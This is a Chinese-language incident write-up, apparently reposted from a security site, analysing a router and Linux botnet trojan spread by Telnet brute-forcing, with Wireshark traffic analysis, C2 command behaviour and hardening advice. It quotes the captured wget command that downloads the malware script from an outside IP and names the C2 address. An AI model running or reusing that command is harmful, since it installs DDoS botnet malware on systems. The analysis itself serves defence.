<span id="7ztzv"></span>
<sub id="7ztzv"></sub>

<span id="7ztzv"></span><form id="7ztzv"></form>

<span id="7ztzv"></span>

        <address id="7ztzv"></address>

            原文地址:http://drops.wooyun.org/tips/15222

            Author:Mr.Right、Gongmo
            申明:文中提到的攻擊方式僅為曝光、打擊惡意網絡攻擊行為,切勿模仿,否則后果自負。

            0x00 前言


            路由器木馬,其主要目標是控制網絡的核心路由設備;一旦攻擊成功,其危害性遠大于一臺主機被控。

            如果僅僅在路由器上面防范該類木馬,那也是不夠的,有很多Linux服務器違規開放Telnet端口,且使用了弱口令,一樣可以中招。下面我們就一起來回顧一起真實案例。

            0x01 發現異常


            在對客戶某服務器區域進行安全監測時發現某服務器通信流量存在大量Telnet協議。截取一段數據,進行協議統計:

            p1

            Telnet協議一般為路由器管理協議,服務器中存在此協議可初步判斷為異常流量。繼續進行端口、IP走向統計:發現大量外部IP通過Tcp23端口(Telnet)連接該服務器。

            p2

            此統計可說明:

            1. 該服務器違規開放了TCP23端口;
            2. 該服務器遭到大量Telnet攻擊,有可能是暴力破解,也有可能是已經成功連接。

            挑選通信量較大的IP,篩選通信雙向數據:

            p3

            查看Telnet數據,發現已經成功連接該服務器。

            p4

            數據中還存在大量Telnet掃描探測、暴力破解攻擊,在此不再詳述。

            0x02 獲取樣本


            為進一步查看Telnet通信內容,Follow TcpStream。

            p5

            將內容復制粘貼至文本編輯器:

            p6

            發現一段自動下載命令:

            #!bash
            wget http://208.67.1.42/bin.sh;
            wget1 http://208.67.1.42/bin2.sh。
            

            連接http://208.67.1.42/bin.sh可發現該腳本文件內容為自動下載獲取木馬,且木馬可感染ARM、MIPS、X86、PowerPC等架構的設備。

            p7

            0x03 木馬分析


            注:本章節不屬于Wireshark分析范疇,本文僅以jackmyx86分析為例

            該木馬文件是ELF格式的,影響的操作系統包括:

            p8

            從上圖中判斷木馬下載的類型分別是:Mipsel,misp,x86(其實這個是x64),arm,x86(i586,i686)等。

            從截獲的*.sh文件看,*.sh腳本想刪除這些目錄和內容,并且關閉一些進程。

            p9

            首先得到了一個”Art of war”的字符串(看來黑客是個文藝青年)。

            p10

            接著嘗試打開路由器配置文件。

            p11

            在配置文件里查找字符串00000000,如果找到就直接填充0;

            p12

            在初始化函數中:嘗試建立socket連接,連接地址為:208.67.1.194:164。

            p13

            嘗試連接服務器,等待遠端服務器應答。

            p14

            服務器發送“ping”命令后,客戶端返回“pong”表示已經連接成功。當發送“GETLOCALIP”后,返回控制端的本機IP。當服務器發送SCANNER后,根據ON或者OFF來控制是否要掃描指定IP,進行暴力破解。當發送“UDP”命令時候,向指定的IP地址發送大量UDP無效數據包。

            p15

            p16

            p17

            下圖是木馬嘗試獲得路由器的用戶名和密碼匹配,企圖暴力破解賬戶和密碼。

            p18

            p19

            p20

            在被控制之后,跟隨服務器指定的IP,發送大量隨機生成的長度為0x400的字符串數據,進行DDOS攻擊。下圖是發送垃圾數據,進行DDOS攻擊。

            p21

            p22

            隨機數據生成的偽代碼如下:

            p23

            根據網址追溯到攻擊者的網頁和twitter賬號。

            p24

            p25

            p26

            0x04 總結


            1. 路由器的管理如非必須,盡量不開放互聯網管理通道
            2. 路由器管理密碼必須強口令、最好超強
            3. Linux服務器一般不要打開Telnet服務
            4. 該木馬一般利用爆破和漏洞來攻擊路由器或開啟Telnet服務的Linux服務器,中招后接受木馬作者的控制,最后進行大量DDOS攻擊

            <span id="7ztzv"></span>
            <sub id="7ztzv"></sub>

            <span id="7ztzv"></span><form id="7ztzv"></form>

            <span id="7ztzv"></span>

                  <address id="7ztzv"></address>

                      亚洲欧美在线